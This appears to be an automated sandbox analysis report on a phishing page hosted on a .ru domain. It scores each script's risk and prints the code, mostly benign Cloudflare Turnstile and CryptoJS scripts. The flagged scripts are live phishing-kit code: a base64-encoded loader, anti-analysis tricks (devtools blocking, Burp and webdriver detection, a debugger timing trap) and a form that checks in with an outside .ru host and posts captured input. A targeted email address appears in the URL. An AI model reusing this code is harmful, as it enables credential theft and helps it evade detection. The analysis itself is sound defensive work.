| URL: https://ovv.contathsor.ru/KzF/#Droberto.rossi@bean... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent."
} |
/* If you really look closely, most overnight successes took a long time. */
if(atob("aHR0cHM6Ly9PdnYuY29udGF0aHNvci5ydS9LekYv") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNnV1F1WkxkTWx5IGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2dXUXVaTGRNbHkgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2dXUXVaTGRNbHkgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojZ1dRdVpMZE1seSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2dXUXVaTGRNbHkuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTU0cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNnV1F1WkxkTWx5IC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9ydGFudDt9DQpAbWVkaWEgKG1pbi13aWR0aDo5OTJweCl7DQojZ1dRdVpMZE1seSAuY29sLWxnLTR7ZmxleDowIDAgYXV0bzt3aWR0aDozMy4zMzMzMzMzMyU7fQ0KfQ0KI2dXUXVaTGRNbHkgLmRpc3BsYXktNCB7Zm9udC1zaXplOiAxLjI1cmVtIWltcG9ydGFudDt9DQojZ1dRdVpMZE1seSAubXQtMiB7bWFyZ2luLXRvcDogMC41cmVtIWltcG9ydGFudDt9DQojZ1dRdVpMZE1seSAuaDQge2ZvbnQtc2l6ZTogY2FsYyguOTAwcmVtICsgLjN2dyk7fQ0KI2dXUXVaTGRNbHkgLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI2dXUXVaTGRNbHkubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNnV1F1WkxkTWx5IC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojZ1dRdVpMZE1seSAjTVRLREppSldMYSB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NCkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzUpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDcyKSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5hbHRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA2NykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQp9KTsNCmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ2NvbnRleHRtZW51JywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgIHJldHVybiBmYWxzZTsNCn0pOw0KUXpHUEVGTVlhVSA9IGZhbHNlOw0KKGZ1bmN0aW9uIEpXb0h6WUp0TFooKSB7DQogICAgbGV0IGRQRkxiR2ZxWXogPSBmYWxzZTsNCiAgICBjb25zdCByS2R0dk9MWmdsID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0K |
| URL: https://ovv.contathsor.ru/KzF/#Droberto.rossi@bean... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including disabling common browser developer tools and functionality, as well as redirecting the user to a suspicious domain (login.microsoftonline.com) after a delay. The script appears to be attempting to detect and prevent security analysis, which is a strong indicator of malicious intent."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
QzGPEFMYaU = false;
(function JWoHzYJtLZ() {
let dPFLbGfqYz = false;
const rKdtvOLZgl = 100;
setInterval(function() {
const IntsyRqQGd = performance.now();
debugger;
const orJOUGlqMW = performance.now();
if (orJOUGlqMW - IntsyRqQGd > rKdtvOLZgl && !dPFLbGfqYz) {
QzGPEFMYaU = true;
dPFLbGfqYz = true;
window.location.replace('https://login.microsoftonline.com');
}
}, 100);
})();
|
| URL: https://ovv.contathsor.ru/KzF/#Droberto.rossi@bean... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which could be part of a phishing attempt. Overall, the script demonstrates highly suspicious and potentially malicious behavior."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA3SBPtuXpEXcG77',
'error-callback': YUXFpGBmpi,
callback: ekMtfaNrPR,
});
function YUXFpGBmpi() {
turnstile.reset();
}
function ekMtfaNrPR() {
var FlBnBiZEgu = document.getElementById("tvDpgIXyTw");
FlBnBiZEgu.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = '1gZvDg';
var VLSNJstnpf = "../fjbcswredYDhzR6GyLuktMfBQvWsPMx9rBq0GR8gkw15Ipim";
fetch('https://4sLidSgeCJWPpZUiC0pryNI8KrN3Cy3Y57sPLAnyJAWLHzoLtzSPDkYD1Lz6.expritraw.ru/63641215031149000jwAkuZovxrICUYSEXFVNLUZRWAGINLTSJFBYDYQIXYGNFJZVZKRYTPFNVDXJ', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(VLSNJstnpf, {
method: "POST",
body: new FormData(FlBnBiZEgu)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
if(QzGPEFMYaU == false){
location.reload();
}
}
if(data['status'] == 'error'){
window.location.replace('https://login.microsoftonline.com');
}
});
}
if(text != 0){
window.location.replace('https://login.microsoftonline.com');
}
})
.catch(error => {
window.location.replace('https://login.microsoftonline.com');
});
}
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. While the script contains some obfuscated code and makes external requests, it is likely part of a legitimate security solution and not inherently malicious. However, the use of obfuscation and the complexity of the script warrant further review to ensure there are no hidden risks or vulnerabilities."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'q7twc',
chlApiSitekey: '0x4AAAAAAA3SBPtuXpEXcG77',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'fU49YIvnsBK7PqgqD9G71GWSaTrVXWwaQMw6AdEuCFE-1736506582-1.3.1.1-ortqS.ZcGXVdBFJxxkUqnIAf5iz4zUxWvg1vD13nogc',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ffc23dada9d429b',
cH: 'guU6vtx9mokavqbICwsN8yfby20jJpUhe1gD5EXq.4M-1736506582-1.1.1.1-PjZ3YmlhJ_IIRVvSOV5DKLK6_4NEzFDw7_I6eV3.SG4QAtw8SO3l6riuSnPnYXgy',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'LlCdkZaxL44dUbVblv6EyGB3JPiP6SmULADhsonPu4A-1736506582-1.1.1.1-ehGE5gdnQZECdbdHfzOraDTuMPGYOOjcyzdCSduaT5Nigd4dE8h_xzdqE_jnBO1gukJEDpbWRlt9gXnXpw_ggHGa15Bjq5H6iTUIs2Z_IurfXOFSn9pW9LGF83viWYqWFfHRDcjcm0FkCJgZWkhfJwXVrnY4PYVLV2eh.l7oZN3znD8ak7irxAzMM4JMVGVBfu3TmXIoKHNKmgbZLhAS9jzU.pbJIcQLYP12vmpY0gWoUw.EYwz6xXq6YtXMDthWLlKgsKr76Qup9tWHllPo8W9cZ8b4x2PR8IabMaIq9G8Cobex_WgM38G6.okQ4ivQbO.07VCQpzvS7R0Dt80.4ikgBBC42GA5hyl_ZCfTyGVBPi6SaYS1kU1gckuJJA9Dpuq33gHIwfhZvjomszwwxcLFfc3q2m.9tUHXI1cweF30DgxJ.xfQn2.QxAPfi3rhT_..C6caPzUjzLBbIdep45OCpkm.EI3ES_oadzM9mzwamUPysf642HBjSdb7vyoYFGr6WgIZNE_kenRdJx2_6N81EY4mZC0KprbTV5CwEf5Sg4dT0XwT2kuq0Pofd1rL3RXQ1CEIOjR9DbsiAccbaNNaudph_ZOvgl7OwCzJxzdlMybpmEUFNAw4uE_qW5u9n6Uvp0EdU7b5aoLEL1_dOCiXDO5S1kwNBwAFQ7vunYH.CFFwyCZrYMXf4tx2fn4lORhyMZjhjsvQ66AOZx2LKmIlhRUW8OxymNGmL
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be related to Cloudflare's Turnstile challenge system, which is a legitimate security mechanism used to verify user interactions. The script contains translations and configuration options for the Turnstile challenge, but does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or malicious redirects. While the script uses some legacy APIs like `XDomainRequest`, which poses a minor risk, the overall behavior is consistent with the expected functionality of the Turnstile challenge system. Therefore, this script is assessed as low risk."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_failure":"Error","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only":"Testing%20only.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_feedback_description":"Send%20Feedback","turnstile_expired":"Expired","turnstile_footer_privacy":"Privacy","turnstile_success":"Success%21","turnstile_refresh":"Refresh","turnstile_timeout":"Timed%20out","turnstile_verifying":"Verifying...","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_report":"Having%20trouble%3F","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_footer_terms":"Terms","human_button_text":"Verify%20you%20are%20human","turnstile_overrun_description":"Stuck%20here%3F","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eP,eQ,eU,eV,f5,fb,fe,fg,fh,fi,fu,fG,fM,fN,fO,fY,g9,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1595))/1*(-parseInt(gI(1695))/2)+parseInt(gI(1302))/3*(-parseInt(gI(1006))/4)+-parseInt(gI(397))/5*(parseInt(gI(938))/6)+-parseInt(gI(1202))/7*(-parseInt(gI(346))/8)+parseInt(gI(1150))/9*(-parseInt(gI(1570))/10)+parseInt(gI(1188))/11+parseInt(gI(1040))/12,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,444631),eM=this||self,eN=eM[gJ(1487)],eO=function(gK,d,e,f,g){return gK=gJ,d={'QtxQd':function(h,i){return i==h},'hmiKG':gK(747),'fQwnM':function(h,i){return h>i},'PPDKU':function(h,i){return h<i},'PlWQf':function(h,i){return h&i},'xTQSt':function(h,i){return h(i)},'bmSCo':function(h,i){return h|i},'dLNGV':function(h,i){return i==h},'KCMjp':function(h,i){return h>i},'XOjhq':function(h,i){return h<<i},'sqVUh':function(h,i){return h-i},'rPmQk':function(h,i){return h(i)},'FUBlf':function(h,i){return i==h},'ffsmh':function(h,i){return h<i},'ILFyp':function(h,i){return i|h},'HjLcg':function(h,i){return i&h},'GEmcp':function(h,i){return i!==h},'qPxxO':function(h,i){return h<i},'CzceL':function(h,i){return i==h},'SWvyO':function(h,i){return h|i},'oIvGn':function(h,i){return h==i},'zrnkR':function(h,i){return h===i},'XBRKO':gK(1177),'YXtOQ':function(h,i){return h>i},'BtBmM':function(h,i){return h<<i},'pSLHD':function(h,i){return h<<i},'gpPyb':function(h,i){return h==i},'fGqij':function(h,i){return i!=h},'tHXsN':function(h,i){return h(i)},'PnUwb':function(h,i){return h*i},'VqaJX':function(h,i){return h(i)},'XjZCG':function(h,i){return h!=i},'tpbbv':function(h,i) |
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is primarily focused on implementing various cryptographic primitives and utilities, which are common in legitimate applications. While the code uses some legacy practices like the `XDomainRequest` API, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script appears to be a benign implementation of cryptographic functionality and poses a low risk."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script sets up various configuration options and event handlers to handle communication between the challenge widget and the parent window. While the script uses some dynamic behavior, such as `postMessage()` and event listeners, it does not exhibit any clear signs of malicious intent or high-risk activities. The script seems to be part of a legitimate security mechanism and is likely not a cause for concern."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'q7twc',
chlApiSitekey: '0x4AAAAAAA3SBPtuXpEXcG77',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'fU49YIvnsBK7PqgqD9G71GWSaTrVXWwaQMw6AdEuCFE-1736506582-1.3.1.1-ortqS.ZcGXVdBFJxxkUqnIAf5iz4zUxWvg1vD13nogc',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ffc23dada9d429b',
cH: 'guU6vtx9mokavqbICwsN8yfby20jJpUhe1gD5EXq.4M-1736506582-1.1.1.1-PjZ3YmlhJ_IIRVvSOV5DKLK6_4NEzFDw7_I6eV3.SG4QAtw8SO3l6riuSnPnYXgy',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'LlCdkZaxL44dUbVblv6EyGB3JPiP6SmULADhsonPu4A-1736506582-1.1.1.1-ehGE5gdnQZECdbdHfzOraDTuMPGYOOjcyzdCSduaT5Nigd4dE8h_xzdqE_jnBO1gukJEDpbWRlt9gXnXpw_ggHGa15Bjq5H6iTUIs2Z_IurfXOFSn9pW9LGF83viWYqWFfHRDcjcm0FkCJgZWkhfJwXVrnY4PYVLV2eh.l7oZN3znD8ak7irxAzMM4JMVGVBfu3TmXIoKHNKmgbZLhAS9jzU.pbJIcQLYP12vmpY0gWoUw.EYwz6xXq6YtXMDthWLlKgsKr76Qup9tWHllPo8W9cZ8b4x2PR8IabMaIq9G8Cobex_WgM38G6.okQ4ivQbO.07VCQpzvS7R0Dt80.4ikgBBC42GA5hyl_ZCfTyGVBPi6SaYS1kU1gckuJJA9Dpuq33gHIwfhZvjomszwwxcLFfc3q2m.9tUHXI1cweF30DgxJ.xfQn2.QxAPfi3rhT_..C6caPzUjzLBbIdep45OCpkm.EI3ES_oadzM9mzwamUPysf642HBjSdb7vyoYFGr6WgIZNE_kenRdJx2_6N81EY4mZC0KprbTV5CwEf5Sg4dT0XwT2kuq0Pofd1rL3RXQ1CEIOjR9DbsiAccbaNNaudph_ZOvgl7OwCzJxzdlMybpmEUFNAw4uE_qW5u9n6Uvp0EdU7b5aoLEL1_dOCiXDO5S1kwNBwAFQ7vunYH.CFFwyCZrYMXf4tx2fn4lORhyMZjhjsvQ66AOZx2LKmIlhRUW8OxymNGmL2jGcV5UCKK177Q9mg_sJZ9YcY.B4Jy6kzcgRgrXpx7F_FVJ6embftp7v9D4f4we8yPbwpu330X8Z_D82kJKiz8lRviFyLrV5X4vF0wPkG4Ul1BxmH6wkr292oHr_22Tn..RgDS1d476mKPfFEDIu20nUnRIKVUQUkL.vB4Pi40y3hsXAX_yiyZzDOVBQ8S0jsVdrpNtcW_k1KQNyXu659hNBoB9CIq45QXWCzr9GY9KQ7YGkIRNEmYK11xB9tM.PQjtQZbH3PXutQ8A0NnyBJfgDZh5yZXZN4Y9xaZVdq38Es3soNIcYOds5J6CSzcj5goVoS7bho9rZS.oOTkiqFF3V175o1KkfHBFK53R6cgSX2b19sR_wNQbSC8XOt0X8w0kqnaNuTifZmvMm.Mcf03BPj9qoCyzBLUVIyT7.crh1QmsaiLQ04tQN8d5ucTicAv7INhVikuMzh.v3pf7GBt8su2JEi0I9bSH6PnnWzYOGmk.jAtPGGkr0g04xoEAUC1bUBTB3b2tQq7Z913Q0r5tWs4ivS70hq7veDPAjhP8eh6A_heX2TuZT_SKR4BhHlUcSiUCUk7VqhkxQqTVc4Y6_jkk.ngeQ4TcyLib_eWL0TWDYmdOHH6qyQR7C54TIFYhLHc',
cITimeS: '1736506582',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'q7twc',
nextRcV: 'fU49YIvnsBK7PqgqD9G71GWSaTrVXWwaQMw6AdEuCFE-1736506582-1.3.1.1-ortqS.ZcGXVdBFJxxkUqnIAf5iz4zUxWvg1vD13nogc',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://ovv.contathsor.ru/KzF/#Droberto.rossi@beantech.it Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with no signs of malicious behavior, such as dynamic code execution or data exfiltration. The code is not obfuscated, and there are no interactions with external domains. The script uses modern JavaScript practices and does not exhibit aggressive DOM manipulation or legacy practices."
} |
